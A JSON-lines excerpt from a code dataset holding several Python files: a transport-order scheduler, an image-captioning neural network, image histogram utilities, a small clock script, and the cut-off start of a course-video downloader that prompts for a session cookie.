self.pickup_finished(self.ids[task.name])\n\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_STARTED\n self.start_tos(task, task.transport_order.delivery_tos, False)\n\n def on_delivery_finished(self, task):\n \"\"\"\n Gets called when the Delivery TransportOrderStep is finished.\n Set petri net state and fire the to_done event to the task net\n \"\"\"\n self.delivery_finished(self.ids[task.name])\n\n to_done_event = Event(\"to_done\", \"\", \"Boolean\", value=True) \n self.petri_net_logic.set_awaited_events(task, [to_done_event])\n self.petri_net_logic.fire_event(task, to_done_event, self.on_petri_net_response)\n\n def on_to_done(self, task_info):\n \"\"\"\n Gets called when transport order is done by the AGV.\n Set petri net state (wait for possible FinishedBy events)\n \"\"\"\n uid = self.ids[task_info.name]\n if self.finished_by_events[task_info.name]:\n transport_order = task_info.transport_order\n transport_order.state = TransportOrder.TransportOrderState.TASK_WAIT_FOR_FINISHED_BY\n self.log_transport_order(uid, transport_order)\n\n finished_by_events = self.finished_by_events[task_info.name]\n self.petri_net_logic.set_awaited_events(task_info, finished_by_events)\n self.wait_for_finished_by(uid, self.finished_by_events[task_info.name])\n\n def on_task_finished(self, task_info):\n \"\"\"\n Gets called when task is finished.\n Starts possible onDone tasks and set petri net state\n \"\"\"\n uid = self.ids[task_info.name]\n self.task_finished(uid)\n self.tasks_done[task_info.name] = True\n\n self.petri_net_logic.set_awaited_events(task_info, [None])\n task_info.transport_order.state = TransportOrder.TransportOrderState.FINISHED\n self.log_transport_order(uid, task_info.transport_order)\n\n if task_info.on_done:\n startable_tasks = []\n for task in task_info.on_done:\n self.not_done_parents[task] = self.not_done_parents[task] - 1\n\n # all parent tasks are done start the task\n if self.not_done_parents[task] == 0:\n task_key = self.tasks[str(self.ids[task])]\n startable_tasks.append(task_key)\n self.not_done_parents[task_key.name] = self.parent_count[task_key.name]\n\n self.start_tasks(startable_tasks)\n elif self.all_tasks_done():\n self._is_running = False\n self.all_finished()\n\n def all_tasks_done(self):\n \"\"\"\n Returns true if all tasks are done\n \"\"\"\n if self.cycle_in_call_graph is False:\n for task_done in self.tasks_done.values():\n if task_done is False:\n return False\n return True\n return False\n\n def log_transport_order(self, to_uuid, transport_order):\n \"\"\"\n Saves the given TransportOrder with its locations in the db \n by calling insert method of the logger\n \"\"\"\n pickup_location = transport_order.pickup_tos.location\n delivery_location = transport_order.delivery_tos.location\n self.logger.insert_transport_order(self._uuid, to_uuid, transport_order.state,\n pickup_location, delivery_location)\n\n def wait_for_triggered_by(self, uuid_, event_information):\n for callback in self.materialflow_callbacks.triggered_by_cb:\n callback(self._uuid, uuid_, event_information)\n\n def wait_for_finished_by(self, uuid_, event_information):\n for callback in self.materialflow_callbacks.finished_by_cb:\n callback(self._uuid, uuid_, event_information)\n\n def task_finished(self, uuid_):\n for callback in self.materialflow_callbacks.task_finished_cb:\n callback(self._uuid, uuid_)\n\n def all_finished(self):\n for callback in self.materialflow_callbacks.all_finished_cb:\n callback(self._uuid)\n\n def pickup_finished(self, uuid_):\n for callback in self.materialflow_callbacks.pickup_finished_cb:\n callback(self._uuid, uuid_)\n\n def delivery_finished(self, uuid_):\n for callback in self.materialflow_callbacks.delivery_finished_cb:\n callback(self._uuid, uuid_)\n\n def register_callback_triggered_by(self, callback):\n \"\"\"\n If a Task can be started and has a TriggeredBy defined, all\n registered callback functions will be called\n \"\"\"\n if callback not in self.materialflow_callbacks.triggered_by_cb:\n self.materialflow_callbacks.triggered_by_cb.append(callback)\n\n def register_callback_next_to(self, callback):\n \"\"\"\n If a Task was started and the TriggeredBy condition is satisfied or there is\n no TriggeredBy all callback functions registered here will be called\n \"\"\"\n if callback not in self.materialflow_callbacks.next_to_cb:\n self.materialflow_callbacks.next_to_cb.append(callback)\n\n def register_callback_finished_by(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the TransportOrder is done\n which means a \"to_done\" event was sent and a FinishedBy was defined\n \"\"\"\n if callback not in self.materialflow_callbacks.finished_by_cb:\n self.materialflow_callbacks.finished_by_cb.append(callback)\n\n def register_callback_task_finished(self, callback):\n \"\"\"\n If a Task is finished functions registered here are being called.\n \"\"\"\n if callback not in self.materialflow_callbacks.task_finished_cb:\n self.materialflow_callbacks.task_finished_cb.append(callback)\n\n def register_callback_all_finished(self, callback):\n \"\"\"\n If all Tasks in a Materialflow are finished functions registered here are being called\n \"\"\"\n if callback not in self.materialflow_callbacks.all_finished_cb:\n self.materialflow_callbacks.all_finished_cb.append(callback)\n\n def register_callback_pickup_finished(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the Pickup TransportOrderStep\n of a task is finished\n \"\"\"\n if callback not in self.materialflow_callbacks.pickup_finished_cb:\n self.materialflow_callbacks.pickup_finished_cb.append(callback)\n\n def register_callback_delivery_finished(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the Delivery TransportOrderStep\n of a task is finished\n \"\"\"\n if callback not in self.materialflow_callbacks.delivery_finished_cb:\n self.materialflow_callbacks.delivery_finished_cb.append(callback)\n","repo_name":"iml130/lotlan-scheduler","sub_path":"lotlan_scheduler/api/materialflow.py","file_name":"materialflow.py","file_ext":"py","file_size_in_byte":21868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41527713686","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\nimport torch.nn.functional as F\nfrom typing import Tuple,List\nfrom .Dataset import MyDataset\nfrom .Vocabulary import Vocabulary\nfrom .Decoder.IDecoder import IDecoder\nfrom .Encoder.IEncoder import IEncoder\nfrom .Attention.IAttention import IAttention\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport matplotlib.pyplot as plt\nfrom VARIABLE import MAX_CAPTION_LENGTH\nfrom .Metrics import Result\n\nclass CaRNet(nn.Module):\n \"\"\"\n The ConvolutionalandRecurrentNet (CaRNet).\n CaRNet works with a Residual NeuralNet with 50layers (ResNet50) with the last layer removed.\n In CaRNet it supports 3 types of LSTM:\n - vI: the features extracted from the image are provided as input with <START> token\n - vH: the features extracted from the image becames the hidden state at t_0\n - vHC: the features extracted from the image becames both the hidden and cell state at t_0\n \n When it is flavoured with Attention, it becames a ConvolutionalAttentionRecurrentNet (CARNet).\n CARNet works with a Residual NeuralNet with 50layers (ResNet50) with the last convolutional layer exposed.\n For now support only 1 type of LSTM:\n - vHC\n \"\"\"\n \n def __init__(self, encoder: IEncoder, decoder: IDecoder, net_name: str, encoder_dim: int, hidden_dim: int, padding_index: int, vocab_size: int, embedding_dim: int, attention: IAttention = None, attention_dim: int = 1024, device: str = \"cpu\"):\n \"\"\"Create the C[aA]RNet \n\n Args:\n encoder (IEncoder): \n The encoder to use.\n \n decoder (IDecoder): \n The decoder to use.\n \n net_name (str): \n Name of the Neural Network.\n \n encoder_dim (int): \n The dimensionality of the features vector extracted from the image.\n \n hidden_dim (int): \n The Capacity of the LSTM Cell.\n \n padding_index (int): \n The index of the padding id, given from the vocabulary associated to the dataset.\n \n vocab_size (int)): \n The size of the vocabulary associated to the dataset.\n \n embedding_dim (int): \n Size associated to the input of the LSTM cell.\n \n attention (IAttention, optional): (Default is None)\n The attention if Provided.\n \n attention_dim (int, optional): (Default is 1024)\n Size of the attention layer, used only if attention is not None.\n \n device (str, optional): \n The device on which the net does the computation. Defaults to \"cpu\".\n \"\"\"\n\n super(CaRNet, self).__init__()\n self.padding_index = padding_index\n self.device = torch.device(device)\n self.name_net = net_name\n self.result_storer = Result()\n # Define Encoder and Decoder\n self.C = encoder(encoder_dim = encoder_dim, device = device)\n self.R = None\n \n # Take the attention in consideration\n self.attention = False\n \n if attention is not None: # I know..some skilled dev. will hate me for this if-else statement. Forgive ME.\n self.attention = True\n self.R = decoder(hidden_dim, padding_index, vocab_size, embedding_dim, device, attention(self.C.encoder_dim, hidden_dim, attention_dim))\n else:\n self.R = decoder(hidden_dim, padding_index, vocab_size, embedding_dim, device)\n\n # Check if the Recurrent net was initialized oth. we are in error state.\n if self.R is None:\n raise ValueError(\"Could not create the Recurrent network.\")\n \n # Send both net to the defined device -> cpu or gpu \n self.C.to(self.device)\n self.R.to(self.device)\n \n def switch_mode(self, mode: str) -> bool: \n \"\"\" Change the working modality of the net among \"training\" or \"evaluation\".\n\n Args:\n mode (str): \n New mode of work, \"training\" | \"evaluation\"\n\n Returns:\n bool: \n If True the state is correctly changed, oth. not.\n \"\"\"\n # Q. Why no control if they already stay in the wanted state?\n # A. Increase the condition may lead to more than expected case to control. Avoid IfElse community addicted :) \n if mode == \"training\":\n self.C.train() # switch to training state\n self.R.train()\n return True\n \n if mode == \"evaluation\":\n self.C.eval() # switch to evaluation state\n self.R.eval()\n return True\n return False\n \n def save(self, file_path: str) -> bool:\n \"\"\"Save the net in non-volatile memory\n\n Args:\n file_name (str): Relative path to save the net. Ex. \"home/pippo/saved\"\n\n Returns:\n bool: If True: Net saved correctly. False otherwise.\n \"\"\"\n try:\n # Name_type_encoderdim_embeddingdim_hiddendim_attentiondim\n torch.save(self.C.state_dict(), f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_C.pth\")\n torch.save(self.R.state_dict(), f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_R.pth\")\n except Exception as ex:\n print(ex)\n return False\n return True\n\n def load(self, file_path: str) -> bool:\n \"\"\"Load the net from non-volatile memory into RAM\n\n Args:\n file_name (str): Relative path of the net. Ex. \"home/pippo/saved\"\n\n Returns:\n bool: If True: Net loaded correctly. False otherwise.\n \"\"\"\n \n # since our classifier is a nn.Module, we can load it using pytorch facilities (mapping it to the right device)\n self.C.load_state_dict(torch.load(f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_C.pth\", map_location=self.device))\n self.R.load_state_dict(torch.load(f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_R.pth\", map_location=self.device))\n \n def forward(self, images: torch.tensor, captions: torch.tensor) -> torch.tensor:\n \"\"\"Provide images to the net for retrieve captions\n\n Args:\n images (torch.tensor): `(Batch Size, Channels, Width, Height)`\n The images of the batch.\n \n captions (torch.tensor): `(Batch Size, Max_Captions_Length)`. \n ASSUMPION: The captions are padded with <PAD> Token\n\n Returns:\n (torch.tensor): `(batch_size, max_captions_length, vocab_size)`\n The output of each time step from t_1 to t_N.\n REMARK <START> token is provided as output at t_0\n \"\"\"\n features = self.C(images)\n return self.R(features, captions)\n\n def __accuracy(self, outputs: torch.tensor, labels: torch.tensor, captions_length: List[int]) -> float:\n \"\"\"Evaluate the accuracy of the Net with Jaccard Similarity.\n Assumption: outputs and labels have same shape and already padded.\n\n Args:\n outputs (torch.tensor): `(batch_dim, MAX_CAPTION_LENGTH)`\n The captions generated from the net.\n labels (torch.tensor): `(batch_dim, MAX_CAPTION_LENGTH)` \n The Real captions.\n captions_length (list): \n\n Returns:\n float: The accuracy of the Net\n \"\"\"\n \n\n # computing the accuracy with Jaccard Similarity, pytorch unique facility has bugs with cuda....it can be done \"a manella\" :)\n # from python 3.9 you could use the package torchmetrics\n # from torchmetrics import JaccardIndex\n # intersection_over_union = JaccardIndex(num_classes=self.R.vocab_size).cuda() if self.device.type != \"cpu\" else JaccardIndex(num_classes=self.R.vocab_size)\n # return intersection_over_union(outputs, labels)\n outputs = np.array(list(map(lambda output: np.unique(output), outputs.cpu())), dtype=object) # Remove duplicate from each caption\n labels = np.array(list(map(lambda label: np.unique(label), labels.cpu())), dtype=object) # Remove duplicate from each caption\n \n unions = list(map(lambda index: len(np.union1d(outputs[index],labels[index])), range(labels.shape[0])))\n intersections = list(map(lambda index: len(np.intersect1d(outputs[index],labels[index])), range(labels.shape[0])))\n return torch.mean(torch.tensor(intersections).type(torch.float)/torch.tensor(unions).type(torch.float), axis=0)\n \n \n def train(self, train_set: MyDataset, validation_set: MyDataset, lr: float, epochs: int, vocabulary: Vocabulary):\n \"\"\"Train the net\n\n Args:\n train_set (MyDataset): \n The associate training set.\n \n validation_set (MyDataset): \n The associate validation set.\n \n lr (float): \n The learning rate.\n \n epochs (int): \n The number of epochs.\n \n vocabulary (Vocabulary): \n The vocabulary associate to the Dataset\n \"\"\"\n \n # Initialize Loss: CrossEntropyLoss -> Softmax + NegativeLogLikelihoodLoss \n # Q. Why ignore_index is setted to <START> instead of <PAD>?\n # A. In the training, both output of the CaRNet and Target is a padded tensor, but when we compute the loss it will evaluate the tensor with pack_padded_sequence.\n # And since <START> token is hardcoded as output at t_0 and it is contained into the Target we could avoid the computation of loss on it, since will be 0. \n \n criterion = nn.CrossEntropyLoss(ignore_index=vocabulary.predefined_token_idx()[\"<START>\"],reduction=\"sum\").cuda() if self.device.type == \"cuda\" \\\n else nn.CrossEntropyLoss(ignore_index=vocabulary.predefined_token_idx()[\"<START>\"],reduction=\"sum\")\n \n # initializing some elements\n best_val_acc = -1. # the best accuracy computed on the validation data\n best_epoch = -1 # the epoch in which the best accuracy above was computed\n \n # ensuring the classifier is in 'train' mode (pytorch)\n self.switch_mode(\"training\")\n\n # creating the optimizer\n optimizer = torch.optim.Adam(list(self.R.parameters()) + list(self.C.parameters()), lr)\n\n # loop on epochs\n for e in range(0, epochs):\n\n # epoch stats (computed by accumulating mini-batch stats)\n epoch_train_acc = 0.\n epoch_train_loss = 0.\n epoch_num_train_examples = 0\n batch_id_reporter = 0\n for images,captions_ids,captions_length in train_set:\n optimizer.zero_grad() \n \n batch_num_train_examples = images.shape[0] # mini-batch size (it might be different from 'batch_size') -> last batch truncated\n epoch_num_train_examples += batch_num_train_examples\n \n # Send data to the appropriate device\n images = images.to(self.device)\n captions_ids = captions_ids.to(self.device)\n captions_length = captions_length.to(self.device)\n \n # computing the network output on the current mini-batch\n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim) \n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim)\n # Retrieve Features for each image\n features = self.C(images)\n \n # Check if attention is provided, if yes the output will change accordly for fitting doubly stochastic gradient\n if self.attention == False: # I know..some skilled dev. will hate me for this if-else statement. Forgive ME.\n outputs, _ = self.R(features, captions_ids, captions_length) # outputs > (B, L, |V|); \n else:\n outputs, _, alphas = self.R(features, captions_ids, captions_length)\n \n outputs = pack_padded_sequence(outputs, captions_length.cpu(), batch_first=True) #(Batch, MaxCaptionLength, |Vocabulary|) -> (Batch * CaptionLength, |Vocabulary|)\n \n targets = pack_padded_sequence(captions_ids, captions_length.cpu(), batch_first=True) #(Batch, MaxCaptionLength) -> (Batch * CaptionLength)\n \n loss = criterion(outputs.data, targets.data)\n \n # Doubly stochastic gradient if attention is ON\n if self.attention == True:\n loss += float(torch.sum((\n 0.5 * torch.sum((\n (1 - torch.sum(alphas, dim=1,keepdim=True)) ** 2 # caption_length sum\n ), dim=2, keepdim=True) # alpha_dim sum\n ), dim=0).squeeze(1)) # batch_dim sum\n \n # computing gradients and updating the network weights\n loss.backward() # computing gradients\n optimizer.step() # updating weights\n\n # Training set accuracy evaluation\n with torch.no_grad():\n self.switch_mode(\"evaluation\")\n \n # computing the network output on the current mini-batch\n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim) \n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim)\n # Retrieve Features for each image\n projections = self.C(images)\n \n # Create a padded tensor manually\n captions_output = torch.zeros((projections.shape[0],captions_ids.shape[1])).to(self.device)\n \n for idx, _ in enumerate(range(projections.shape[0])):\n # OUT: (1, CAPTION_LENGTH)\n if self.attention == True:\n _caption_no_pad, _ = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, H_portions, W_portions, encoder_dim), 1)\n else:\n _caption_no_pad = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, encoder_dim), 1)\n # Add for each batch element the caption. The surplus element are already feeded with zeros\n captions_output[idx,:_caption_no_pad.shape[1]] = _caption_no_pad\n \n\n captions_output_padded = captions_output.type(torch.int32).to(self.device) # Out: (batch_dim, MAX_CAPTION_LENGTH)\n \n # computing performance\n batch_train_acc = self.__accuracy(captions_output_padded.squeeze(1), captions_ids, captions_length)\n\n # accumulating performance measures to get a final estimate on the whole training set\n epoch_train_acc += batch_train_acc * batch_num_train_examples\n\n # accumulating other stats\n epoch_train_loss += loss.item() * batch_num_train_examples\n \n self.switch_mode(\"training\")\n \n # printing (mini-batch related) stats on screen\n print(f\" mini-batch:\\tloss={loss.item():.4f}, tr_acc={batch_train_acc:.5f}\")\n \n # Store result of this batch in a dataframe\n self.result_storer.add_train_info(epoch=int(e), batch_id=int(batch_id_reporter),loss=float(loss.item()),accuracy=float(batch_train_acc) )\n batch_id_reporter += 1\n # Evaluate the accuracy of the validation set\n val_acc = self.eval_net(validation_set,vocabulary)\n\n # # saving the model if the validation accuracy increases\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_epoch = e + 1 \n self.save(\"./.saved\")\n \n epoch_train_loss /= epoch_num_train_examples\n # Store the result of the validation set in this epoch\n self.result_storer.add_validation_info(epoch=int(e), accuracy=float(val_acc))\n # printing (epoch related) stats on screen\n print(f\"epoch={e + 1}/{epochs}:\\tloss={epoch_train_loss:.4f}, tr_acc={epoch_train_acc / epoch_num_train_examples:.5f}, val_acc={val_acc:.5f}, {'BEST!' if best_epoch == e+1 else ''}\")\n # store data in files\n self.result_storer.flush()\n \n def eval_net(self, data_set, vocabulary):\n \"\"\" Evaluate a data set\n\n Args:\n data_set (MyDataset): \n The associate data set.\n \n vocabulary (Vocabulary): \n The vocabulary associate to the Dataset\n\n Returns:\n (int):\n Accuracy on given dataset\n \"\"\"\n \n self.switch_mode(\"evaluation\") # enforcing evaluation mode\n with torch.no_grad(): # keeping off the autograd engine\n _images = None\n # loop on mini-batches to accumulate the network outputs (creating a new iterator)\n for images,captions_ids,captions_length in data_set:\n images = images.to(self.device)\n \n captions_ids = captions_ids.to(self.device)\n \n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim)\n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim) \n # Retrieve Features for each image\n projections = self.C(images) \n \n # Create a padded tensor manually\n captions_output = torch.zeros((projections.shape[0],captions_ids.shape[1])).to(self.device)\n \n for idx, _ in enumerate(range(projections.shape[0])):\n # OUT: (1, CAPTION_LENGTH)\n if self.attention == True:\n _caption_no_pad, _ = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, H_portions, W_portions, encoder_dim), 1)\n else:\n _caption_no_pad = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, encoder_dim), 1)\n # Add for each batch element the caption. The surplus element are already feeded with zeros\n captions_output[idx,:_caption_no_pad.shape[1]] = _caption_no_pad\n \n # Pick the 1st image of the last batch for printing out the result \n _image = images[0]\n captions_output_padded = captions_output.type(torch.int32).to(self.device) # Out: (batch_dim, MAX_CAPTION_LENGTH)\n \n # computing performance\n acc = self.__accuracy(captions_output_padded.squeeze(1), captions_ids, captions_length)\n \n self.eval(_image,vocabulary)\n self.switch_mode(\"training\")\n \n return acc\n \n def __generate_image_caption(self, image: torch.Tensor, vocabulary: Vocabulary, image_name: str = \"caption.png\"):\n \"\"\" Genareate an image with caption.\n\n Args:\n image (torch.Tensor): `(channels, height, width)`\n The tensorial representation of the image in resnet50 form.\n \n vocabulary (Vocabulary): \n The vocabulary associated to the dataset.\n \n image_name (str, optional): Defaults to \"caption.png\".\n The image of the generated file\n \"\"\"\n self.switch_mode(\"evaluation\") # enforcing evaluation mode\n \n # If Attention is on:\n # Out: 1st step (batch_dim,H_portions, W_portions, encoder_dim) -> 2nd step (batch_dim, H_portions * W_portions, encoder_dim) \n # Else:\n # Out: (1, encoder_dim) \n features = self.C(image.unsqueeze(0))\n \n if self.attention == True:\n caption, alphas = self.R.generate_caption(features,MAX_CAPTION_LENGTH)\n else:\n caption = self.R.generate_caption(features,MAX_CAPTION_LENGTH)\n \n # Generate image caption\n caption = vocabulary.rev_translate(caption[0])\n \n # Adjust the color of the image wrt the transform operation of the resnet50\n image[0] = image[0] * 0.229\n image[1] = image[1] * 0.224 \n image[2] = image[2] * 0.225 \n image[0] += 0.485 \n image[1] += 0.456 \n image[2] += 0.406\n \n # Swap color channels\n image = image.permute((1,2,0)) # IN: (height, width, channels)\n \n # If attention is ON perform the evaluation of attention over the immage\n if self.attention == True:\n self.__generate_image_attention(image, caption, alphas)\n\n plt.figure(figsize=(15, 15))\n plt.imshow(image.cpu())\n plt.title(caption)\n plt.savefig(\"caption.png\")\n plt.close()\n \n self.switch_mode(\"training\")\n \n def __generate_image_attention(self, image: torch.tensor, caption, alphas, image_name: str = \"attention.png\"):\n \"\"\"Perform the evaluation of the attention over the image.\n\n Args:\n image (torch.Tensor): \n The tensorial representation of the image.\n \n caption (list(str)): \n The caption.\n \n alphas (torch.Tensor): \n \n image_name (str, optional): Defaults to \"attention.png\".\n The image of the generated file\n \"\"\"\n self.switch_mode(\"evaluation\") \n \n fig = plt.figure(figsize=(15, 15))\n _caption_len = len(caption)\n for t in range(_caption_len):\n # from 49 element to 7x7\n _att = alphas[t].reshape(self.R.attention.number_of_splits,self.R.attention.number_of_splits)\n \n # Add a subplot accordly to the word in caption position\n ax = fig.add_subplot(_caption_len//2, _caption_len//2, t+1)\n \n ax.set_title(f\"{caption[t]}\", fontsize=12)\n \n img = ax.imshow(image.cpu())\n \n # Add attention layer\n ax.imshow(_att, cmap='gray', alpha=0.7, extent=img.get_extent())\n plt.tight_layout()\n plt.savefig(image_name)\n plt.close()\n \n self.switch_mode(\"training\")\n \n # Inspiration is taken from this example https://www.kaggle.com/mdteach/image-captioning-with-attention-pytorch\n # Thanks ABISHEK BASHYAL :)\n def eval(self, image: object, vocabulary: Vocabulary):\n \"\"\"Evaluate an image and retrieve the associated caption.\n\n Args:\n image (PIL.Image.Image or torch.Tensor): if tensor `(channels, height, width)`\n The image for which it evaluate the caption. \n \n vocabulary (Vocabulary): \n The vocabulary.\n\n Raises:\n ValueError: If the image is not a tensor or an image.\n \"\"\"\n # enforcing evaluation mode\n self.switch_mode(\"evaluation\")\n \n if isinstance(image, Image.Image):\n operations = transforms.Compose([\n transforms.Resize((MyDataset.image_trasformation_parameter[\"crop\"][\"size\"], MyDataset.image_trasformation_parameter[\"crop\"][\"size\"])), # Crops the given image at the center.\n transforms.ToTensor(),\n transforms.Normalize(mean=MyDataset.image_trasformation_parameter[\"mean\"], std=MyDataset.image_trasformation_parameter[\"std_dev\"])\n ])\n image = operations(image)\n \n if not(isinstance(image,torch.Tensor)): \n raise ValueError(f\"Image is not the expected type, got: {type(image)}.\")\n \n self.__generate_image_caption(image,vocabulary)\n \n self.switch_mode(\"training\")\n \n","repo_name":"gnekt/Image-Captioning-with-Python","sub_path":"NeuralModels/CaRNet.py","file_name":"CaRNet.py","file_ext":"py","file_size_in_byte":25294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"6724084979","text":"from datetime import datetime\n\n\nclass TimeToGoHome:\n now = datetime.now().strftime(\"%H:%M\")\n homeTime = \"19:00\"\n\n @staticmethod\n def restar_hora(hora1, hora2):\n formato = \"%H:%M\"\n h1 = datetime.strptime(hora1, formato)\n h2 = datetime.strptime(hora2, formato)\n resultado = h1 - h2\n return str(resultado)\n\n if restar_hora(homeTime, now) < \"0\":\n print(\"Hora de irse a casa\")\n else:\n print(\"Para ir a casa falta: \", restar_hora(homeTime, now))\n","repo_name":"Rituzka/OB_Python_TimeHome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27681003243","text":"import cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport streamlit as st\r\n#################################################################################################################\r\n\r\ndef rgb_to_gray(source: np.ndarray):\r\n gray = np.dot(source[..., :3], [0.299, 0.587, 0.114]).astype('uint8')\r\n return gray\r\n#################################################################################################################\r\n\r\n\r\ndef global_threshold(source: np.ndarray, threshold: int):\r\n # source: gray image\r\n src = np.copy(source)\r\n for x in range(src.shape[0]):\r\n for y in range(src.shape[1]):\r\n if src[x, y] > threshold:\r\n src[x, y] = 255\r\n else:\r\n src[x, y] = 0\r\n return src\r\n # src = np.copy(source)\r\n # if len(src.shape)> 2:\r\n # src = rgb_to_gray(source)\r\n # return (src > threshold).astype('int')\r\n#################################################################################################################\r\n\r\n\r\ndef local_threshold1(source: np.ndarray, divs: int):\r\n # source: gray image\r\n src = np.copy(source)\r\n for row in range(0, src.shape[0], divs):\r\n for col in range(0, src.shape[1], divs):\r\n mask_src = src[row:row+divs, col:col+divs]\r\n threshold = int(np.mean(mask_src))-10\r\n src[row:row+divs, col:col +\r\n divs] = global_threshold(source=mask_src, threshold=threshold)\r\n return src\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef histogram(source: np.array, bins_num: int = 255):\r\n if bins_num == 2:\r\n new_data = source\r\n else:\r\n new_data = source.astype('uint8')\r\n bins = np.arange(0, bins_num)\r\n hist = np.bincount(new_data.ravel(), minlength=bins_num)\r\n return hist, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef equalize_histogram(source: np.ndarray, bins_num: int = 256):\r\n #\r\n bins = np.arange(0, bins_num)\r\n\r\n # Calculate the Occurrences of each pixel in the input\r\n hist_array = np.bincount(source.flatten(), minlength=bins_num)\r\n\r\n # Normalize Resulted array\r\n px_count = np.sum(hist_array)\r\n hist_array = hist_array / px_count\r\n\r\n # Calculate the Cumulative Sum\r\n hist_array = np.cumsum(hist_array)\r\n\r\n # Pixel Mapping\r\n trans_map = np.floor(255 * hist_array).astype('uint8')\r\n\r\n # Transform Mapping to Image\r\n img1d = list(source.flatten())\r\n map_img1d = [trans_map[px] for px in img1d]\r\n\r\n # Map Image to 2d & Reshape Image\r\n img_eq = np.reshape(np.asarray(map_img1d), source.shape)\r\n\r\n return img_eq, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef normalize_histogram(source: np.ndarray, bins_num: int = 256):\r\n mn = np.min(source)\r\n mx = np.max(source)\r\n norm = ((source - mn) * (256 / (mx - mn))).astype('uint8')\r\n hist, bins = histogram(norm, bins_num=bins_num)\r\n return norm, hist, bins\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef draw_rgb_histogram(source: np.ndarray):\r\n\r\n colors = [\"red\", \"green\", \"blue\"]\r\n # colors = [(0, 0, 1),(0, 1, 0),(1, 0, 0)]\r\n figure, axis = plt.subplots()\r\n for i in range(source.shape[2]):\r\n hist, bins = histogram(source=source[:, :, i], bins_num=256)\r\n # plt.plot(bins, hist, color=colors[i])\r\n axis.plot(bins, hist, color=colors[i])\r\n axis.set_xlabel('color value')\r\n axis.set_ylabel('Pixel count')\r\n st.pyplot(figure)\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef draw_gray_histogram(source: np.ndarray, bins_num):\r\n\r\n figure, axis = plt.subplots()\r\n # Create histogram and plot it\r\n hist, bins = histogram(source=source, bins_num=bins_num)\r\n axis.plot(bins, hist)\r\n axis.set_xlabel('gray value')\r\n axis.set_ylabel('Pixel count')\r\n st.pyplot(figure)\r\n\r\n#################################################################################################################\r\n\r\n\r\ndef display_bar_graph(x, height, width):\r\n figure, axis = plt.subplots()\r\n plt.bar(x, height, width)\r\n st.pyplot(figure)\r\n#################################################################################################################\r\ndef hist_bar(source: np.ndarray):\r\n figure, axis = plt.subplots()\r\n _ = plt.hist(source[:, :, 0].ravel(), bins = 256, color = 'red')\r\n _ = plt.hist(source[:, :, 1].ravel(), bins = 256, color = 'Green')\r\n _ = plt.hist(source[:, :, 2].ravel(), bins = 256, color = 'Blue')\r\n _ = plt.xlabel('Intensity Value')\r\n _ = plt.ylabel('Count')\r\n st.pyplot(figure)\r\n#################################################################################################################\r\n\r\ndef rgb_distribution_curve(source: np.ndarray):\r\n colors = [\"red\", \"green\", \"blue\"]\r\n figure, axis = plt.subplots()\r\n for i in range(source.shape[2]):\r\n hist, bins = histogram(source=source[:, :, i], bins_num=256)\r\n pdf = (hist) / sum(hist)\r\n cdf = np.cumsum(pdf)\r\n axis.plot(bins, cdf, label=\"CDF\", color=colors[i])\r\n st.pyplot(figure)\r\n#############################################################################################################","repo_name":"MariamTurky/Computer_Vision","sub_path":"Task_1/Histograms.py","file_name":"Histograms.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41371343982","text":"# -*- coding: utf-8 -*-\n\n#########################################\n# File name: Sala do Saber Downlaoder #\n# Author: H4dar #\n# Orderer: Prince Andrews #\n# Description: Bot para realizar #\n# download dos videos e materias da #\n# plataforma SALA DO SABER, feito em #\n# Python, sob as libs de requests, para #\n# as duvidas que possam a vir, o codigo #\n# conta com diversos comentarios. #\n#########################################\n\nimport requests\nimport os\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport urllib\nimport time\n\nsalasaber_session = requests.session() #Cria uma sessão para evitar multiplos requests\nclass Downloader(): #Unica classe e reponsavel por realizar todas as funções\n\n def index(self): #Nossa primeira def, utilizada apenas para passar as informações iniciais\n\n os.system('cls') \n ci_session = input('Cookies da Sessão: ')\n 